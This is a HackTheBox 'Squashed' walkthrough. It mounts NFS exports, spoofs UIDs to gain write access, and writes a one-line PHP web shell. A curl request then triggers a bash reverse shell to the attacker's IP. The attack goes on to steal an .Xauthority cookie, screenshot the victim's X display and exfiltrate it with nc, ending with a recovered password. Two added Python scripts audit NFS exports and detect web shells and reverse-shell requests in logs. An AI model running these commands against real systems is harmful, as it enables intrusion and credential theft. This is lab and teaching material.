HackTheBox – Squashed Walkthrough – In English
┌──(root㉿kali)-[/home/kali/Downloads]
└─# nmap -A 10.10.11.191
┌──(root㉿kali)-[/home/kali/Downloads]
└─# showmount -e 10.10.11.191
┌──(root㉿kali)-[/home/kali/Downloads]
└─# mkdir /tmp/www /tmp/home_test
┌──(root㉿kali)-[/home/kali/Downloads]
└─# sudo mount -t nfs 10.10.11.191:/home/ross /tmp/home_test
┌──(root㉿kali)-[/home/kali/Downloads]
└─# sudo mount -t nfs 10.10.11.191:/var/www/html /tmp/www
Once we mount them we can see some interesting files. In /home/ross there is a Passwords.kdbx file, which is a KeePass database, and a .Xauthority file, which holds the cookie for the GUI (X) session, among other stuff. We can't get into /var/www/html, because we neither own it nor belong to its group, but since the export trusts the UID we present, we can add a local user with the matching UID to access it.
┌──(root㉿kali)-[/home/kali/Downloads]
└─# cd /tmp
┌──(root㉿kali)-[/tmp]
└─# ls -l
┌──(root㉿kali)-[/tmp]
└─# tree -fas ./home_test
┌──(root㉿kali)-[/tmp]
└─# tree -fas ./www
┌──(root㉿kali)-[/tmp]
└─# cd ./www
Once we add the user, we can get in.
┌──(root㉿kali)-[/tmp]
└─# sudo useradd sam
┌──(root㉿kali)-[/tmp]
└─# sudo usermod -u 2017 sam
┌──(root㉿kali)-[/tmp]
└─# sudo groupmod -g 2017 sam
┌──(root㉿kali)-[/tmp]
└─# id sam
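The two things that make this step work are on the server side: the export honours whatever UID the client presents (no all_squash), and a user's home directory, with its KeePass database and .Xauthority, is inside an exported tree. The following is an added defender-side check, not part of the walkthrough and not the box's own configuration: it parses an exports file, flags entries that trust client UIDs, allow client root, are writable or are exported to any host, and sweeps each exported directory for files that should never be reachable over NFS. The exports text and the directory layout are constructed for the demo, and the hardened entry shown is an assumption about what a corrected export would look like.

```python
"""Audit an /etc/exports file for UID trust and for sensitive files inside
exported trees. Added example; exports text and directories are constructed."""
import fnmatch
import os
import re
import tempfile

# Filenames a defender would not want reachable over an NFS export.
SENSITIVE_PATTERNS = [".Xauthority", "*.kdbx", "id_rsa", "id_ed25519", ".bash_history"]

EXPORT_RE = re.compile(r"^(\S+)\s*(.*)$")
# Either host(opt,opt) or a bare host with no option list.
CLIENT_RE = re.compile(r"(\S+?)\(([^)]*)\)|(\S+)")


def parse_exports(text):
    """Yield (path, client, options-set) for every client spec in an exports file."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        path, rest = EXPORT_RE.match(line).groups()
        if not rest:
            yield path, "*", set()  # path alone means: everyone, default options
            continue
        for host, opts, bare in CLIENT_RE.findall(rest):
            options = {o.strip() for o in opts.split(",") if o.strip()}
            yield path, host or bare, options


def audit_export(client, options):
    """Return human-readable findings for one client spec."""
    findings = []
    if client == "*":
        findings.append("exported to any host")
    if "no_root_squash" in options:
        findings.append("no_root_squash: client root is server root")
    if "all_squash" not in options:
        findings.append("UID mapping trusts client UIDs (no all_squash)")
    if "rw" in options:
        findings.append("writable")
    return findings


def sensitive_files(path):
    """Walk an exported directory and list files matching SENSITIVE_PATTERNS."""
    hits = []
    for dirpath, _dirs, files in os.walk(path):
        for name in files:
            if any(fnmatch.fnmatch(name, pat) for pat in SENSITIVE_PATTERNS):
                hits.append(os.path.join(dirpath, name))
    return sorted(hits)


def audit(text):
    """Return {export_path: {"findings": [...], "sensitive": [...]}}."""
    report = {}
    for path, client, options in parse_exports(text):
        entry = report.setdefault(path, {"findings": [], "sensitive": []})
        entry["findings"] += [f"{client}: {f}" for f in audit_export(client, options)]
        if os.path.isdir(path) and not entry["sensitive"]:
            entry["sensitive"] = sensitive_files(path)
    return report


def demo():
    """Build a constructed tree shaped like the box and audit a weak and a hardened exports file."""
    root = tempfile.mkdtemp()
    home = os.path.join(root, "home", "ross")
    www = os.path.join(root, "var", "www", "html")
    os.makedirs(os.path.join(home, "Documents"))
    os.makedirs(www)
    for rel in [".Xauthority", os.path.join("Documents", "Passwords.kdbx")]:
        open(os.path.join(home, rel), "w").close()
    open(os.path.join(www, "index.php"), "w").close()
    weak = f"""# constructed: same shape as the box's exports
{home}   *(rw,sync,root_squash)
{www}    *(rw,sync)
"""
    # Assumed hardened form: no home export, read-only, squashed, one subnet.
    hardened = f"{www}    10.0.0.0/24(ro,sync,all_squash,anonuid=65534,anongid=65534)\n"
    return audit(weak), audit(hardened), home, www


if __name__ == "__main__":
    weak_report, hardened_report, _home, _www = demo()
    for path, entry in weak_report.items():
        print(path, entry["findings"], [os.path.basename(f) for f in entry["sensitive"]])
    print("hardened:", {p: e["findings"] for p, e in hardened_report.items()})
```

Run it as-is and the weak file produces three findings per export plus the two sensitive files under ross's home, while the hardened line produces none. The point of the `all_squash` check is exactly the trick used above: without it, `usermod -u 2017` on the client is enough to become the directory owner on the server.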
Since we can write to it, let's drop a PHP web shell and send ourselves a reverse shell.
┌──(root㉿kali)-[/home/kali/Downloads]
└─# nc -nlvp 443
┌──(root㉿kali)-[/tmp]
└─# su sam
$ bash
sam@kali:/tmp$ ls -l
sam@kali:/$ echo '<?php system($_REQUEST["cmd"]); ?>' > /tmp/www/shell.php
sam@kali:/$ curl "http://10.10.11.191/shell.php?cmd=bash%20-c%20%22bash%20-i%20%3E%26%20/dev/tcp/10.10.14.6/443%200%3E%261%22"
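From the blue-team side this step leaves two artefacts: a new PHP file in the web root that passes a request parameter straight into a command-execution function, and an access-log entry whose query string carries shell syntax. The following is an added example, not code from the walkthrough or the box, showing both checks: a sweep of a web root for that source pattern, and a parser for Apache combined-format log lines that URL-decodes the request target and flags it. The PHP files and log lines it creates are constructed for the demo; the first log line reproduces the request shape used above.

```python
"""Find PHP web shells on disk and flag command-injection style requests in
an access log. Added example; files and log lines below are constructed."""
import os
import re
import tempfile
from urllib.parse import unquote_plus

# Command sinks in PHP, paired with any user-controlled superglobal.
EXEC_FUNCS = r"(?:system|exec|shell_exec|passthru|popen|proc_open)"
SUPERGLOBAL = r"\$_(?:REQUEST|GET|POST|COOKIE)"
# sink( ... $_X ... ) within one statement; [^;] keeps it from spanning statements.
WEBSHELL_RE = re.compile(EXEC_FUNCS + r"\s*\(\s*[^;]*?" + SUPERGLOBAL, re.IGNORECASE)
EVAL_RE = re.compile(r"\beval\s*\(\s*" + SUPERGLOBAL, re.IGNORECASE)


def scan_webroot(root):
    """Return sorted paths of PHP files that wire a superglobal into a command sink."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".php", ".phtml", ".phar")):
                continue
            full = os.path.join(dirpath, name)
            with open(full, "r", errors="replace") as fh:
                src = fh.read()
            if WEBSHELL_RE.search(src) or EVAL_RE.search(src):
                hits.append(full)
    return sorted(hits)


# Apache/nginx combined log format: ip ident user [ts] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
SHELL_INDICATORS = ("/dev/tcp/", "bash -i", "nc -e", "| sh", "/bin/sh", "python -c",
                    "perl -e", "0>&1", "2>&1", ";id", ";cat ")


def suspicious_requests(lines):
    """Return [(ip, decoded_target, reasons)] for lines whose decoded query looks like a command."""
    out = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        decoded = unquote_plus(m.group("target"))  # %20, %22, %3E%26 ... back to text
        reasons = [ind for ind in SHELL_INDICATORS if ind in decoded]
        # A cmd/exec-style parameter on a PHP file is a signal on its own.
        if re.search(r"\.php\?(?:.*&)?(?:cmd|exec|command|c)=", decoded):
            reasons.append("command-style parameter")
        if reasons:
            out.append((m.group("ip"), decoded, reasons))
    return out


def demo():
    """Constructed web root and log: one shell, two benign files, one attack request."""
    root = tempfile.mkdtemp()
    samples = {
        "shell.php": '<?php system($_REQUEST["cmd"]); ?>',
        "index.php": '<?php echo "hello"; ?>',
        # benign: the sink and the superglobal are in different statements
        "util.php": '<?php system("ls"); echo htmlspecialchars($_GET["q"]); ?>',
    }
    for name, src in samples.items():
        with open(os.path.join(root, name), "w") as fh:
            fh.write(src)
    log = [  # constructed combined-format lines; first mirrors the request used in the walkthrough
        '10.10.14.6 - - [12/Nov/2022:10:01:02 +0000] "GET /shell.php?cmd=bash%20-c%20%22bash%20-i%20%3E%26%20/dev/tcp/10.10.14.6/443%200%3E%261%22 HTTP/1.1" 200 0 "-" "curl/7.85.0"',
        '10.10.14.7 - - [12/Nov/2022:10:01:05 +0000] "GET /index.php HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
        '10.10.14.8 - - [12/Nov/2022:10:01:09 +0000] "GET /search.php?q=bash%20scripting HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    ]
    return scan_webroot(root), suspicious_requests(log)


if __name__ == "__main__":
    hits, flagged = demo()
    print("web shells:", [os.path.basename(h) for h in hits])
    for ip, target, reasons in flagged:
        print(ip, target, reasons)
```

The file scan is deliberately narrow (sink and superglobal inside one statement) so that ordinary code calling `system()` with a constant does not trip it; a real deployment would pair it with a check for files modified after the last deploy, which is how a dropped shell.php in an export-writable docroot stands out.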
┌──(root㉿kali)-[/tmp/home_test]
└─# tree
┌──(root㉿kali)-[/tmp/home_test]
└─# cd Documents
┌──(root㉿kali)-[/tmp/home_test/Documents]
└─# ls -lrt
┌──(root㉿kali)-[/tmp/home_test/Documents]
└─# cp Passwords.kdbx /home/kali/Downloads
┌──(root㉿kali)-[/tmp/home_test/Documents]
└─# cd /home/kali/Downloads
┌──(root㉿kali)-[/home/kali/Downloads]
└─# keepass2john Passwords.kdbx
However, we saw the .Xauthority file, and as we can see, ross has an active X session that we can
alex@squashed:/home/alex$ w
Well, in order to use the .Xauthority file, we have to create a local user with the same UID as ross, which is 1001.
┌──(root㉿kali)-[/home/kali/Downloads]
└─# sudo useradd test2
┌──(root㉿kali)-[/home/kali/Downloads]
└─# sudo usermod -u 1001 test2
┌──(root㉿kali)-[/home/kali/Downloads]
└─# su test2
test2@kali:/home/kali/Downloads$ cd /tmp/home_test/
test2@kali:/tmp/home_test$ ls -l ./.Xauthority
Let's start a Python HTTP server and transfer the file from the mount to the target machine, so that we have the same .Xauthority as ross.
test2@kali:/tmp/home_test$ python3 -m http.server 8080
alex@squashed:/home/alex$ wget http://10.10.14.6:8080/.Xauthority
Let's check the connection. As we can see, ross has KeePass open, so we can try to take a screenshot of his display; with some luck we will get something juicy.
alex@squashed:/home/alex$ env
alex@squashed:/home/alex$ export HOME=/home/alex
alex@squashed:~$ env
alex@squashed:~$ xdpyinfo -display :0
alex@squashed:~$ xwininfo -root -tree -display :0
Let's take the screenshot and transfer it to our machine.
alex@squashed:~$ xwd -root -screen -silent -display :0 > screenshot.xwd
alex@squashed:~$ file ./screenshot.xwd
┌──(root㉿kali)-[/home/kali/Downloads]
└─# nc -nlvp 9001 > screenshot.xwd
alex@squashed:~$ nc 10.10.14.6 9001 < screenshot.xwd
┌──(root㉿kali)-[/home/kali/Downloads]
└─# convert screenshot.xwd screen.png
Password: cah$mei7rai9A